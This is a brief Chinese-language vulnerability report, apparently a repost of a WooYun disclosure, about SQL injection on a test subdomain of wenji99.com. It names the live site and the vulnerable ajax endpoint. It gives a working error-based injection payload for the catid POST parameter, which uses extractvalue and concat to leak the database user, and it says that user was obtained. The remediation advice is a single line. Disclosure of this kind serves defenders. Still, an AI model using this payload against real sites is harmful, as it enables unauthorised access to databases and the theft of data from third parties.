文集网某站存在SQL注入漏洞
程序员文章站
2022-03-11 15:36:37
文集网某站存在SQL注入漏洞 漏洞影响网站http://test.wenji99.com注入点http://test.wenji99.com/cate_show_ajax.php?ope...
文集网某站存在SQL注入漏洞
漏洞影响网站
http://test.wenji99.com
注入点
http://test.wenji99.com/cate_show_ajax.php?oper=ajax&call=get_cate
POST参数
catid=12313213131313113) and extractvalue(1,concat(0x7e7e7e,user(),0x7e7e7e))%23
WooYun: mallbuilder多用户商城最新版SQL注入(四)
获取到的数据库当前用户信息:[email protected]
解决方案:
更新系统
上一篇: Spring MVC学习笔记
下一篇: 推荐阅读分享我2017重要的学习心得